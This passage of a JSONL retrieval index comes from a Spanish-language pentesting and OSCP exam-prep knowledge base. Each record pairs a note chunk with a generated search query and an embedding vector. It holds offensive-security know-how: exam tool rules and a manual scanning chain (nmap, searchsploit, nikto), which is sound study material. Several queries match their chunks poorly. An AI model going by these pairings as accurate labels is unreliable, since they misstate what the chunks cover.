0.01696, 0.02739]} +{"tipo": "pregunta", "herramienta": "Reglas de herramientas", "perfil": "PENTESTERS", "fichero": "conocimiento/00 - Metodologia/Reglas de herramientas.md", "tema": "metodologia", "fuente": null, "licencia": null, "texto": "## β›” Prohibido\n- **Metasploit / Meterpreter β†’ solo en UNA mΓ‘quina.**\n - Solo el **foothold inicial** cuenta como \"uso\"; post-explotaciΓ³n con meterpreter NO cuenta.\n- ExplotaciΓ³n automΓ‘tica: `sqlmap` en modo auto, autopwn.\n- EscΓ‘neres de vulnerabilidades masivos: **Nessus, OpenVAS, Nexpose, Core Impact**.\n- IA durante el examen.", "indexar": "cual es una alternativa a sqlmap que no use modo automΓ‘tico", "v": [-0.04095, 0.10241, -0.06859, -0.07126, -0.12418, -0.13772, -0.11111, -0.0791, -0.21914, 0.02683, -0.1826, -0.25089, 0.08249, 0.01645, -0.02179, -0.00955, 0.05498, -0.16737, 0.01671, 0.0701, -0.01885, -0.05998, -0.08854, -0.11377, -0.14047, 0.0627, 0.03199, 0.05401, -0.26564, 0.03004, -0.00403, 0.05383, 0.04485, -0.10247, -0.03761, -0.00291, 0.16062, 0.01363, -0.02672, -0.05415, -0.02793, -0.10468, -0.10672, 0.08362, 0.01705, -0.0142, -0.06778, 0.04282, -0.08833, 0.0018, -0.05644, -0.02692, -0.10568, -0.01799, 0.04074, -0.01444, 0.20381, -0.09449, 0.01583, -0.04109, -0.04682, 0.00597, -0.04671, 0.02168, -0.01863, 0.0129, -0.00364, -0.00257, -0.04202, 0.0675, 0.02709, 0.09787, 0.0204, -0.07348, 0.02951, 0.03121, 0.00021, 0.0064, 0.0334, 0.00636, -0.01825, -0.13534, -0.064, 0.05233, -0.02005, -0.07118, 0.05503, 0.04266, 0.0291, 0.00553, -0.02288, -0.00553, 0.04717, 0.06185, 0.007, -0.10225, 0.03977, 0.00128, -0.0159, 0.00721, 0.10338, -0.07673, -0.129, 0.09993, 0.0906, -0.00543, 0.05887, 0.05502, -0.0662, -0.00237, 0.07096, 0.08047, -0.00593, -0.02389, 0.08366, -0.04217, 0.02248, 0.06309, -0.06504, -0.02056, -0.10261, 0.00477, -0.03005, -0.09163, 0.05393, 0.00032, 0.00655, 0.01389, 0.00641, 0.04909, 0.03891, -0.0532, -0.05093, -0.12132, -0.07297, -0.03303, -0.02056, -0.02967, 0.06123, -0.00947, 0.00226, 0.04745, 0.00646, -0.10728, 0.04213, -0.04144, -0.00149, -0.06218, -0.02477, -0.02125, -0.10706, 0.03856, 0.02965, 0.09591, -0.05494, -0.00773, -0.03988, -0.00872, -0.07104, 0.06663, 0.01717, -0.03953, 0.02472, 0.13422, 0.00036, -0.04622, -0.00648, -0.08298, 0.02018, -0.00491, 0.05056, 0.06954, 0.03259, -0.0651, 0.0123, -0.06582, -0.04144, -0.03334, 0.08889, -0.00433, 0.00213, -0.01361, -0.07052, -0.02828, 0.01242, -0.06398, -0.03484, 0.00565, 0.01792, -0.0105, -0.05934, 0.06164, -0.0111, -0.10417, 0.00739, -0.02225, 0.02968, -0.03634, -0.01664, -0.03962, -0.02939, -0.0254, -0.07276, -0.03374, -0.02739, 0.0299, -0.02833, 0.07273, 0.01905, -0.00809, 0.04587, -0.02459, 0.02708, 0.03102, -0.04845, -0.04822, -0.029, -0.05713, -0.02687, -0.04883, 0.01182, -0.01805, 0.00377, -0.00349, -0.0138, 0.03785, 0.00879, 0.028, -0.02262, -0.01794, -0.00206, 0.01003, -0.00201, 0.0304, 0.01667, -0.0079, 0.01386, -0.02456, 0.00183, -0.09824, 0.02756, 0.02374, -0.00153, 0.03214, -0.02146, 0.00629, -0.04959, 0.01359, -0.04236, -0.04448, 0.04678, 0.01927, 0.00043, 0.00366, 0.03314, 0.02491]} +{"tipo": "pregunta", "herramienta": "Reglas de herramientas", "perfil": "PENTESTERS", "fichero": "conocimiento/00 - Metodologia/Reglas de herramientas.md", "tema": "metodologia", "fuente": null, "licencia": null, "texto": "## β›” Prohibido\n- **Metasploit / Meterpreter β†’ solo en UNA mΓ‘quina.**\n - Solo el **foothold inicial** cuenta como \"uso\"; post-explotaciΓ³n con meterpreter NO cuenta.\n- ExplotaciΓ³n automΓ‘tica: `sqlmap` en modo auto, autopwn.\n- EscΓ‘neres de vulnerabilidades masivos: **Nessus, OpenVAS, Nexpose, Core Impact**.\n- IA durante el examen.", "indexar": "quΓ© programa puedo usar para escanear vulnerabilidades de forma manual", "v": [0.0155, -0.00145, -0.16161, -0.1518, 0.00434, -0.07232, -0.05618, -0.15254, -0.11368, -0.04666, -0.11639, -0.08829, -0.0414, -0.04714, -0.08859, 0.07873, 0.07943, -0.1666, 0.05759, 0.09689, -0.02192, -0.07097, -0.06824, -0.01733, -0.09046, 0.11357, 0.03609, -0.04581, -0.05405, -0.05158, -0.0349, 0.08916, 0.09343, -0.05862, -0.07454, 0.06995, 0.05795, -0.02805, 0.078, 0.11299, 0.04822, -0.02623, -0.09452, -0.00057, 0.08076, -0.00871, -0.01734, -0.00528, -0.05544, 0.0518, -0.04934, -0.0306, -0.10348, 0.04978, 0.03313, -0.14351, 0.1408, -0.14724, 0.02345, -0.00829, -0.02154, 0.07602, 0.07689, 0.04652, 0.00236, -0.0475, 0.06711, -0.02917, -0.17451, 0.09915, -0.01838, 0.03542, 0.01438, -0.01181, -0.03556, 0.00657, -0.0712, -0.01655, 0.04451, 0.00307, -0.02433, 0.05848, 0.02306, 0.0488, -0.15259, -0.04251, 0.14611, 0.00374, 0.03297, -0.11322, 0.0447, -0.00383, -0.02271, 0.00382, 0.09105, -0.092, 0.08401, 0.10357, -0.03143, -0.00342, 0.00374, -0.08883, -0.00926, 0.15675, 0.00496, 0.0416, 0.03746, 0.00548, -0.07982, 0.01516, -0.04323, 0.04326, -0.12841, 0.00075, -0.12642, 0.07274, -0.00634, -0.00444, 0.06761, -0.07662, -0.04991, -0.03413, -0.03387, 0.01107, 0.14378, 0.01818, 0.0669, 0.12677, -0.05942, 0.01979, -0.01265, -0.0473, -0.00688, -0.00844, -0.00444, -0.02522, 0.00657, -0.01981, -0.05716, -0.01299, 0.02785, 0.0452, -0.01972, 0.0247, -0.01058, -0.00528, 0.03436, -0.07731, -0.00078, -0.01575, 0.06745, 0.02267, -0.05391, 0.03952, -0.04941, -0.04442, 0.0336, -0.00365, -0.07345, 0.04901, -0.04609, 0.02137, -0.00791, -0.01288, 0.07341, -0.05245, 0.06494, 0.01407, 0.06417, 0.07431, 0.02501, 0.14093, 0.07129, -0.04817, 0.06551, -0.06479, 0.01155, -0.06049, -0.01358, -0.04681, -0.03976, 0.04778, 0.04135, 0.03366, 0.04209, -0.0063, 0.00165, -0.00123, 0.03215, 0.01492, -0.05604, 0.03018, 0.00967, -0.00499, 0.02866, -0.04243, -0.00043, 0.01757, -0.01222, -0.09961, -0.06804, 0.00156, -0.0462, -0.04821, 0.15565, 0.10507, -0.04986, -0.0456, 0.07319, 0.13702, 0.01075, -0.0565, 0.10617, 0.0064, -0.02332, -0.0314, -0.03946, 0.08561, 0.02641, -0.03846, 0.00615, -0.03383, 0.03988, 0.05171, 0.02774, -0.06569, -0.00626, -0.04186, 0.01919, 0.03753, 0.00879, -0.05323, -0.05862, -0.04913, 0.00937, -0.01846, 0.03931, 0.01275, 0.01265, -0.05818, 0.01928, 0.10239, 0.00632, -0.02463, -0.03967, -0.03524, -0.03584, 0.02009, 0.00647, 0.00249, -0.02692, 0.03916, 0.00644, -0.10435, 0.01321, -0.02174]} +{"tipo": "pregunta", "herramienta": "Reglas de herramientas", "perfil": "PENTESTERS", "fichero": "conocimiento/00 - Metodologia/Reglas de herramientas.md", "tema": "metodologia", "fuente": null, "licencia": null, "texto": "## Nota prΓ‘ctica\nNessus se aprende para el **trabajo real** (es estΓ‘ndar), pero en el examen se replica a mano:\n```\nnmap -sV β†’ searchsploit β†’ nmap --script vuln / nikto\n```\n\nRelacionado: Estructura del examen Β· MetodologΓ­a OSCP Β· OSCP MOC", "indexar": "que programa se usa para la enumeration de puertos y versiones de servicios", "v": [0.23833, -0.04054, -0.03933, -0.182, 0.03568, -0.09088, 0.13403, -0.21018, -0.0898, -0.1244, -0.16529, -0.03279, 0.05031, -0.0498, -0.06756, -0.07545, 0.0364, -0.06813, 0.14406, 0.06256, -0.06493, 0.03486, -0.03683, -0.00348, -0.07962, 0.12038, 0.04949, -0.05946, 0.01044, 0.08949, 0.02965, -0.02085, 0.06608, -0.14268, 0.01554, -0.06851, 0.06347, -0.00368, 0.08571, 0.10703, 0.09409, 0.0215, 0.01409, 0.00133, 0.06427, -0.07738, 0.03601, 0.02714, 0.10462, -0.07672, -0.03101, 0.02126, -0.10908, 0.07188, 0.05657, -0.04405, -0.05575, -0.06968, -0.12736, 0.03693, -0.02985, 0.03772, 0.01712, -0.05112, 0.0475, -0.02211, -0.04605, 0.01552, -0.03182, 0.06036, -0.05343, -0.00974, 0.11366, -0.02256, -0.10522, -0.0623, -0.03423, 0.00865, -0.04035, 0.04992, -0.02216, -0.04884, -0.02613, 0.07084, -0.07895, -0.03878, -0.07249, 0.02013, 0.03957, -0.06726, 0.0472, 0.00077, -0.06806, 0.14626, 0.00454, -0.03451, 0.07976, 0.06517, 0.0251, 0.03258, 0.13253, 0.01894, -0.0545, 0.11193, -0.07971, 0.08279, 0.11232, -0.04915, 0.00881, 0.05463, 0.11835, -0.0245, 0.00919, -0.06384, -0.08355, -0.00282, -0.00463, -0.04699, 0.00464, 0.02191, -0.02218, -0.02603, -0.06174, 0.00701, 0.06555, 0.03033, -0.04571, 0.12666, -0.02383, -0.00183, 0.10459, -0.03911, -0.06703, -0.08438, -0.02237, -0.04651, 0.03961, -0.05298, 0.0469, -0.06936, -0.05808, 0.10603, -0.01994, 0.08951, 0.02823, -0.01695, -0.04123, -0.0132, -0.0259, -0.02262, -0.00359, 0.06523, -0.04753, 0.04695, -0.03049, -0.03428, 0.06724, -0.03681, -0.06445, 0.06644, -1e-05, 0.00643, -0.01465, -0.07307, 0.05222, 0.0017, 0.0083, 0.04251, 0.05929, 0.00864, -0.03052, 0.12358, -0.02245, -0.08908, -0.01336, 0.03611, -0.03168, -0.0412, -0.02691, 0.03317, -0.08316, 0.02024, 3e-05, -0.02677, -0.07261, -0.07347, -0.07107, -0.03725, 0.0008, -0.03511, -0.03007, -0.01447, -0.04742, -0.02469, 0.0131, 0.02203, -0.05119, 0.03874, -0.0162, -0.06035, -0.07369, -0.00197, 0.02083, 0.00402, 0.01981, 0.12794, -0.0061, 0.04581, 0.04103, 0.09026, -0.03442, 0.02191, -0.02193, 0.01471, -0.00407, -0.04612, -0.0483, 0.04869, 0.08928, 0.07135, -0.09344, -0.00039, -0.062, 0.07473, -0.03633, -0.06371, 0.07627, 0.05528, 0.02672, 0.03568, 0.00362, -0.02672, -0.04071, -0.07481, 0.01237, -0.02812, -0.02591, 0.02227, -0.01418, -0.09936, -0.00588, 0.02242, 0.02529, -0.03763, 0.02689, -0.01935, -0.01568, 0.01402, 0.04431, 0.02546, -0.07313, 0.07209, -0.0176, -0.06886, 0.03109, -0.04102]} +{"tipo": "pregunta", "herramienta": "Reglas de herramientas", "perfil": "PENTESTERS", "fichero": "conocimiento/00 - Metodologia/Reglas de herramientas.md", "tema": "metodologia", "fuente": null, "licencia": null, "texto": "## Nota prΓ‘ctica\nNessus se aprende para el **trabajo real** (es estΓ‘ndar), pero en el examen se replica a mano:\n```\nnmap -sV β†’ searchsploit β†’ nmap --script vuln / nikto\n```\n\nRelacionado: Estructura del examen Β· MetodologΓ­a OSCP Β· OSCP MOC", "indexar": "cual es una alternativa gratuita a las herramientas de auditoria de seguridad de pago", "v": [0.032, 0.04068, -0.11777, -0.17288, -0.00849, -0.04912, 0.01696, -0.08788, -0.20698, 0.00721, -0.12521, -0.16415, 0.02506, 0.07276, 0.04958, -0.09306, 0.0845, -0.03077, 0.13157, 0.04941, 0.07947, 0.01385, -0.05948, -0.00181, -0.14065, -0.00585, 0.09656, -0.02031, -0.09393, 0.12713, 0.09716, -0.00045, 0.04731, -0.07706, -0.1166, 0.06316, 0.10538, 0.0426, 0.09491, 0.06288, 0.05268, -0.02249, 0.02474, -0.01969, 0.07426, -0.07333, 0.00211, 0.10751, 0.01664, 0.06951, -0.12834, -0.04234, -0.08323, -0.01013, 0.03193, -0.09138, 0.16754, -0.06938, 0.00303, -0.12813, -0.12466, 0.05931, -0.01628, 0.04695, -0.06547, 0.06331, -0.02064, -0.01045, -0.08183, 0.02316, 0.01389, -0.04632, -0.0137, 0.05468, -0.12617, -0.08352, 0.0016, -0.017, -0.03097, 0.07125, 0.04549, -0.00629, -0.008, 0.05993, -0.16539, -0.03271, -0.02189, -0.0955, -0.00157, 0.07111, 0.00847, 0.08034, 0.06084, 0.07728, -0.0739, -0.03357, 0.09266, -0.07247, -0.04233, -0.01994, 0.09997, -0.08301, -0.04096, 0.04335, 0.06974, 0.0268, -0.07099, 0.06847, -0.00137, -0.03833, -0.00735, 0.05176, -0.05331, -0.02172, -0.02484, -0.03456, 0.02579, 0.01647, 0.06947, -0.00456, 0.02189, 0.06071, -0.09826, -0.02859, 0.07804, -0.02011, 0.04125, 0.04587, -0.0043, -0.00178, 0.08878, -0.07855, -0.06377, -0.04189, -0.02732, -0.05244, -0.01245, -0.11182, -0.01865, -0.01576, 0.05068, 0.02931, 0.00347, -0.03892, 0.09229, -0.02085, -0.01019, -0.05252, -0.08936, -0.0327, -0.08791, -0.00353, -0.03191, 0.0457, -0.04534, 0.02081, -0.0113, 0.00139, -0.09916, 0.0528, 0.03218, -0.06732, 0.0847, 0.00308, -0.03216, -0.07632, 0.0479, -0.0505, -0.06093, -0.0052, 0.01957, 0.08783, 0.04338, -0.02571, 0.00406, -0.07333, -0.01647, -0.13449, 0.04821, -0.09194, 0.02392, 0.02173, -0.0899, -0.06885, 0.01336, -0.10717, 0.03381, 0.04035, 0.03174, 0.10371, 0.01308, 0.00788, -0.13749, -0.03428, -0.00019, -0.01309, -0.02608, -0.10354, -0.07213, 0.02783, -0.04604, 0.00952, -0.01386, -0.07589, -0.00892, 0.00449, -0.00466, 0.04195, -0.03023, 0.01927, 0.10415, 0.02738, 0.06031, -0.08384, 0.01019, 0.00356, 0.04328, -0.02784, -0.08954, 0.05563, 0.03701, -0.00825, 0.00986, -0.01997, 0.00657, -0.00034, -0.01131, 0.04996, -0.03682, 0.00696, -0.00148, 0.01315, -0.08016, 0.00022, 0.01839, -0.00962, 0.02182, -0.01702, -0.03154, -0.02389, 0.03355, 0.08147, -0.00865, -0.00046, -0.07469, -0.01974, -0.0311, -0.05334, -0.05781, -0.05496, 0.01413, 0.07909, 0.01762, 0.0151, 0.00366, -0.04165]} +{"tipo": "pregunta", "herramienta": "Reglas de herramientas", "perfil": "PENTESTERS", "fichero": "conocimiento/00 - Metodologia/Reglas de herramientas.md", "tema": "metodologia", "fuente": null, "licencia": null, "texto": "## Nota prΓ‘ctica\nNessus se aprende para el **trabajo real** (es estΓ‘ndar), pero en el examen se replica a mano:\n```\nnmap -sV β†’ searchsploit β†’ nmap --script vuln / nikto\n```\n\nRelacionado: Estructura del examen Β· MetodologΓ­a OSCP Β· OSCP MOC", "indexar": "con que puedo montar un entorno de simulaciΓ³n de examen de certificaciΓ³n de hacking", "v": [0.23018, 0.06932, -0.10695, -0.20252, 0.02932, -0.10956, -0.10093, 0.07078, -0.03492, -0.03107, -0.08211, 0.07303, -0.02515, -0.00263, 0.02647, 0.13444, 0.05674, -0.10709, -0.05691, 0.09433, 0.04024, -0.04907, -0.05902, -0.01481, 0.05096, 0.01791, -0.05442, 0.0493, -0.11285, -0.06447, 0.12797, 0.1124, 0.06125, 0.00403, -0.07054, -0.0196, -0.00374, 0.0118, 0.07748, 0.09143, 0.02717, 0.01239, 0.01423, 0.0057, 0.02137, 0.01323, 0.00879, -0.04721, 0.00385, -0.082, 0.03503, -0.00955, -0.1385, -0.09125, -0.00427, -0.09346, 0.10216, -0.04327, 0.19459, -0.18562, -0.01184, 0.07004, 0.07941, -0.00485, 0.06339, 0.02753, 0.07167, 0.1019, -0.1218, 0.06049, 0.00136, -0.05383, 0.00306, -0.0476, -0.08537, -0.06962, -0.01811, 0.03306, 0.06797, -0.00294, 0.01396, -0.03661, 0.02925, -0.00073, -0.16427, 0.01999, -0.06246, -0.03586, 0.08574, 0.00488, -0.01016, 0.06855, 0.02642, -0.00606, 0.02579, -0.08679, 0.16573, -0.02711, -0.02793, -0.05024, -0.05891, 0.02739, -0.05142, 0.11945, -0.03035, 0.07812, 0.03883, -0.06906, 0.05663, -0.07125, 0.00126, 0.04358, -0.15556, -0.04054, -0.04843, -0.08563, 0.04702, 0.01743, 0.02138, -0.04978, -0.00153, -0.0183, 0.03919, 0.01863, 0.04497, 0.01911, -0.00897, 0.08069, -0.04954, -0.035, 0.00742, -0.01917, -0.09767, 0.05105, -0.01116, -0.01768, -0.07405, -0.13597, -0.02011, -0.01865, -0.00476, 0.06848, 0.02134, -0.02569, 0.04154, 0.10414, -0.03773, -0.10062, -0.04284, -0.02051, -0.05318, 0.08866, 0.0396, 0.09582, -0.15228, -0.01089, 0.01829, -0.06575, 0.0636, 0.0788, 0.00905, 0.02601, -0.00284, -0.0273, -0.00659, 0.08831, 0.00869, -0.05686, 0.01383, -0.0074, -0.05939, 0.043, -0.03267, -0.0605, 0.12552, 0.0459, 0.00539, -0.05373, -0.02463, -0.06022, -0.08289, 0.03025, 0.0019, -0.01748, 0.03427, 0.01947, 0.03933, 0.03369, 0.06972, 0.02368, 0.04295, 0.00483, -0.06673, 0.06039, 0.04283, -0.00035, -0.00575, -0.0122, 0.05351, -0.08178, -0.03084, -0.04603, -0.01885, -0.05959, 0.04467, 0.07039, 0.00919, 0.02199, -0.03274, 0.06418, 0.04895, -0.02374, 0.02683, -0.03439, -0.02808, -0.00462, 0.05731, 0.02553, -0.0292, -0.01152, -0.01262, 0.01759, 0.05846, 0.03648, -0.05097, -0.00633, 0.00766, 0.02282, 0.03512, 0.03109, 0.03269, 0.00778, -0.03727, -0.02278, 0.0435, 0.01012, 0.05995, 7e-05, -0.08994, -0.06657, 5e-05, 0.05464, -0.04456, -0.13881, -0.06538, -0.0236, -0.04628, -0.00524, 0.01996, -0.05579, -0.06595, -0.0149, 0.0369, -0.01183, -0.02823, -0.02134]} +{"tipo": "pregunta", "herramienta": "GestiΓ³n del tiempo", "perfil": "PENTESTERS", "fichero": "conocimiento/00 - Metodologia/GestiΓ³n del tiempo.md", "tema": "metodologia", "fuente": null, "licencia": null, "texto": "# GestiΓ³n del tiempo\n\n> 24h β‰  24h. **Duermes 6h. Comes. Te duchas.** El cerebro fresco resuelve; el cansado entra en rabbit-holes.", "indexar": "quΓ© programa me ayuda a planificar mi dΓ­a de forma mΓ‘s eficiente?", "v": [0.07896, 0.24896, -0.1415, -0.08156, 0.13054, -0.02185, -0.02188, -0.01748, -0.20884, -0.14057, -0.10204, -0.01128, -0.002, -0.12046, -0.01603, -0.04462, 0.0844, -0.02913, 0.04149, 0.01856, -0.03433, -0.03568, -0.08023, 0.02291, -0.06387, -0.02329, 0.1703, 0.01953, -0.13059, 0.04285, 0.02428, 0.10977, 0.00993, -0.07907, 0.04407, 0.08847, 0.03127, 0.09484, -0.05106, -0.0534, -0.11348, -0.02512, 0.03434, 0.03947, 0.111, 0.01043, -0.03714, -0.00702, 0.0082, 0.04492, -0.1144, 0.00778, 0.0851, 0.03523, 0.04558, -0.03515, -0.09294, -0.16923, -0.05465, -0.08553, -0.01863, -0.03811, -0.03129, 0.00644, 0.13665, 0.04632, 0.0637, -0.04717, -0.07586, 0.0177, -0.04563, 0.03072, 0.0602, -0.05476, 0.00436, 0.01305, 0.0963, 0.05999, 0.03872, -0.07357, 0.01532, -0.01024, -0.04829, 0.07661, -0.02117, 0.03805, 0.03967, 0.05625, -0.02793, -0.01261, -0.03328, -0.02387, 0.0213, 0.0539, 0.02771, 0.04372, 0.11897, 0.08531, 0.08161, 0.06884, 0.03658, -0.13607, -0.09543, 0.05915, -0.00084, 0.05097, -0.0016, 0.02713, -0.15019, 0.0499, -0.03277, -0.05364, -0.02505, -0.04919, -0.03872, -0.04497, 0.00246, 0.00334, -0.00092, -0.08937, -0.08603, 0.11084, 0.00121, 0.04956, 0.06613, -0.03156, 0.02793, 0.09643, -0.0379, 0.08136, -0.05788, 0.04591, -0.03506, -0.03819, 0.00362, -0.03841, -0.00491, -0.04823, -0.00826, -0.0217, -0.0336, 0.01071, -0.01312, -0.07943, 0.02633, -0.07249, 0.09929, -0.08904, -0.02606, 0.04434, -0.02778, 0.06736, 0.08673, 0.01498, -0.06316, -0.01991, -0.02234, -0.04164, -0.05479, 0.09987, -0.06217, 0.01788, -0.03762, -0.0365, 0.11588, -0.06734, 0.0487, 0.05903, 0.03559, 0.13951, 0.01974, 0.02761, 0.02804, -0.09615, -0.04503, -0.06252, 0.00354, -0.04457, -0.00049, -0.00776, -0.07479, 0.07134, 0.02258, 0.03416, -0.06699, -0.04428, -0.0149, 0.0047, 0.00014, -0.04612, 0.06217, 0.01527, 0.02953, -0.05029, -0.07969, -0.06191, -0.02517, -0.03725, 0.03702, -0.04926, -0.04917, -0.07859, 0.05909, -0.04594, 0.04117, 0.11535, -0.04222, 0.00829, 0.07169, 0.08527, 0.02497, 0.00135, 0.06416, -0.047, -0.03149, 0.01494, -0.01387, 0.02552, 0.02285, 0.01352, 0.01364, 0.02246, 0.02495, -0.01397, 0.01269, -0.03649, 0.08001, 0.06601, -0.01072, 0.05248, -0.03224, -0.08475, 0.03474, -0.05643, -0.01115, -0.02164, 0.00355, -0.05138, -0.0274, -0.06037, 0.00261, 0.0651, 0.00065, -0.02111, -9e-05, 0.01447, -0.07077, 0.0023, -0.02863, -0.02384, 1e-05, 0.08477, 0.10306, -0.04416, 0.09873, -0.04598]} +{"tipo": "pregunta", "herramienta": "GestiΓ³n del tiempo", "perfil": "PENTESTERS", "fichero": "conocimiento/00 - Metodologia/GestiΓ³n del tiempo.md", "tema": "metodologia", "fuente": null, "licencia": null, "texto": "# GestiΓ³n del tiempo\n\n> 24h β‰  24h. **Duermes 6h. Comes. Te duchas.** El cerebro fresco resuelve; el cansado entra en rabbit-holes.", "indexar": "con quΓ© herramienta puedo gestionar mejor mis actividades diarias para evitar perder el tiempo?", "v": [-0.06051, 0.18854, -0.12467, -0.10892, -0.0065, 0.00087, -0.10761, 0.07269, -0.13354, -0.09409, -0.03096, -0.07105, 0.00446, -0.06013, 0.10623, 0.02001, 0.12134, -0.03531, -0.02222, 0.03186, -0.04388, -0.00288, 0.01271, -0.02527, -0.03365, -0.10616, 0.01386, -0.03424, -0.2133, 0.07235, -0.05119, 0.05955, 0.12809, -0.1528, -0.01284, 0.06682, -0.02959, 0.11833, 0.02982, -0.08664, -0.04324, 0.11588, -0.05933, 0.0348, 0.11245, -0.03919, -0.08013, -0.04154, -0.05549, 0.0078, -0.07803, -0.06811, 0.06423, -0.01376, 0.03895, -0.05646, 0.08937, -0.1591, 0.04295, -0.17916, -0.08343, 0.09462, -0.05099, 0.02074, 0.04813, -0.02373, 0.11024, -0.02695, -0.08263, 0.20304, -0.03348, 0.02055, 0.08139, 0.04276, -0.00259, -0.07362, 0.12134, 0.0908, -0.01778, -0.00205, 0.0233, -0.00963, -0.00185, 0.03215, -0.05501, -0.16972, 0.08852, -0.03522, -0.03211, -0.03913, 0.00865, 0.01493, 0.01747, -0.08679, -0.05903, 0.04842, 0.0496, -0.02266, -0.04069, 0.06874, 0.06899, -0.01301, -0.09955, 0.02007, -0.04921, -0.04526, -0.05235, 0.06477, -0.03089, -0.07829, -0.09205, -0.07663, -0.05312, -0.0222, 0.00222, 0.174, -0.04494, -0.09009, -0.03592, -0.03379, 0.01567, -0.01598, -0.0369, 0.00657, 0.10112, -0.03517, 0.03383, 0.0724, -0.02995, -0.01021, -0.12667, -0.03302, -0.0293, -0.03993, -0.04105, 0.00394, 0.01253, -0.03066, -0.04001, -0.09043, -0.03892, 0.04297, -0.0572, -0.02157, 0.07015, -0.03061, 0.01451, -0.05268, -0.03993, 0.01135, 0.05766, -0.07374, 0.07742, 0.07243, 0.00726, 0.02709, -0.02149, -0.03804, -0.06318, 0.06606, 0.01516, 9e-05, -0.04951, 0.03962, 0.01259, -0.09461, 0.06097, 0.10013, -0.00905, 0.06557, 0.03655, 0.07443, 0.08312, -0.10553, -0.01783, -0.04176, -0.0047, 0.00469, 0.06251, -0.06045, 0.01968, 0.02156, 0.00066, 0.00893, 0.01554, -0.07942, 0.01502, 0.01221, 0.00817, -0.00868, -0.02261, 0.04335, 0.04272, -0.05129, 0.00764, -0.01345, 0.07945, -0.04809, -0.01281, 0.00957, 0.00898, -0.0501, 9e-05, 0.04726, 0.04276, 0.05933, -0.01601, 0.0234, 0.04771, 0.04048, 0.02046, 0.04157, 0.01604, -0.07243, -0.04702, -0.01462, 0.01397, -0.0007, -0.0429, -0.05599, 0.05106, -0.02492, 0.06376, -0.03656, -0.07269, -0.00752, 0.04963, 0.06009, 0.00862, 0.04344, -0.03111, 0.01274, 0.01274, 0.02652, 0.0559, -0.02471, 0.06907, -0.07594, 0.01407, 0.03433, -0.00476, 0.08709, 0.01013, -0.00409, -0.05649, 0.04086, -0.01087, 0.00056, -0.03654, -0.06332, 0.01659, -0.01289, 0.07722, 0.03196, 0.06392, -0.04742]} +{"tipo": "pregunta", "herramienta": "GestiΓ³n del tiempo", "perfil": "PENTESTERS", "fichero": "conocimiento/00 - Metodologia/GestiΓ³n del tiempo.md", "tema": "metodologia", "fuente": null, "licencia": null, "texto": "## Reglas\n- **1.5h sin progreso = cambia de mΓ‘quina.** Cierra, vuelve mΓ‘s tarde con cabeza fresca.\n- Empieza por el **set de AD** (40 pts) con tiempo β†’ ver Estructura del examen.\n- Saca **todos los `user`** antes de pelear un root concreto.\n- Vigila el Egress filtering pronto: descubrir tarde que un puerto estΓ‘ bloqueado cuesta horas.", "indexar": "quΓ© herramienta sirve para limpiar la base de datos de usuarios y sesiones en Linux?", "v": [-0.04443, 0.06287, -0.15051, -0.22058, 0.0019, -0.25283, -0.22322, -0.00874, -0.03402, 5e-05, -0.06609, -0.1513, 0.03366, -0.14787, 0.08039, -0.05203, -0.02265, -0.1315, -0.02153, -0.05637, -0.07074, 0.09221, -0.13503, 0.01726, -0.08648, 0.07558, 0.16701, -0.13899, -0.07163, 0.14851, -0.06498, -0.00597, -0.01162, 0.02657, -0.07059, 0.00514, -0.03823, 0.01403, -0.01072, 0.06009, 0.08722, 0.03151, -0.04835, 0.0732, 0.02149, -0.0766, 0.02884, -0.0185, 0.03068, -0.05439, -0.00788, -0.03307, -0.09367, -0.02678, -0.00261, -0.09222, 0.13951, -0.13422, 0.11224, 0.00387, -0.18156, 0.01094, -0.00336, 0.07211, 0.03405, -0.01808, 0.01229, -0.05459, -0.02868, 0.12149, 0.00478, 0.12379, 0.02912, -0.05352, 0.00684, -0.05306, 0.01414, 0.03942, 0.01507, 0.00076, 0.05738, -0.0334, -0.04919, 0.00437, -0.12952, -0.10678, 0.09032, 0.01848, -0.03867, 0.00576, 0.02815, 0.12534, 0.02033, 0.01344, 0.08914, 0.07937, 0.10039, 0.03457, 0.00785, -0.01198, 0.08204, 0.02248, -0.05927, 0.06506, -0.01504, 0.00552, -0.02878, -0.03007, -0.09055, -0.11298, 0.0237, -0.05394, -0.00092, -0.04291, -0.03367, -0.02168, -0.02163, -0.01249, -0.04988, -0.01936, 0.03599, 0.01479, -0.01228, -0.01709, -0.00875, -0.01118, 0.00727, 0.09888, -0.04055, -0.04499, 0.02346, -0.06123, -0.0817, 0.06665, -0.00261, -0.00145, -0.009, -0.11479, -0.03941, -0.02688, 0.02769, 0.13247, -0.05952, 0.00379, 0.13587, -0.03461, 0.11919, -0.02689, -0.0453, -0.057, 0.06447, -0.03598, 0.03268, 0.00553, -0.08147, -0.01879, -0.00454, -0.01828, -0.11679, -0.0507, -0.05296, -0.09359, 0.04842, 0.01592, -0.01501, -0.02533, 0.02564, 0.08601, 0.04702, 0.06001, 0.052, 0.06459, 0.022, -0.08427, 0.027, -0.02883, -0.01068, -0.04807, -0.01164, -0.01864, 0.02157, -0.02594, 0.01283, -0.05076, 0.00797, 0.00509, -0.01499, -0.02898, 0.00428, 0.0088, -0.02212, 0.05987, 0.02007, -0.08432, 0.016, -0.02161, -0.02768, -0.03658, 0.04495, 0.02434, -0.08157, 0.04351, 0.01076, 0.02205, 0.00842, 0.00661, -0.02292, -0.05644, 0.02416, -0.04735, 0.03123, 0.03942, 0.04042, -0.0268, -0.00908, -0.01076, 0.02625, 0.01196, 0.06284, 0.00457, -0.01421, 0.0278, 0.0476, -0.03754, -0.00768, -0.01208, 0.02001, -0.04177, 0.02671, 0.00255, 0.03662, -0.03606, -0.00444, -0.01375, 0.00907, -0.01818, 0.00925, -0.00675, -0.00975, -0.02094, -0.06788, 0.02808, -0.01813, -0.06967, 0.0093, -0.04418, -0.04165, -0.00259, -0.04285, -0.06752, -0.04836, -0.03093, 0.06821, -0.02224, -0.03286, 0.0128]} +{"tipo": "pregunta", "herramienta": "GestiΓ³n del tiempo", "perfil": "PENTESTERS", "fichero": "conocimiento/00 - Metodologia/GestiΓ³n del tiempo.md", "tema": "metodologia", "fuente": null, "licencia": null, "texto": "## Reglas\n- **1.5h sin progreso = cambia de mΓ‘quina.** Cierra, vuelve mΓ‘s tarde con cabeza fresca.\n- Empieza por el **set de AD** (40 pts) con tiempo β†’ ver Estructura del examen.\n- Saca **todos los `user`** antes de pelear un root concreto.\n- Vigila el Egress filtering pronto: descubrir tarde que un puerto estΓ‘ bloqueado cuesta horas.", "indexar": "con quΓ© programa puedo desactivar o monitorear el filtrado de salida (egress) para ver si hay puertos bloqueados?", 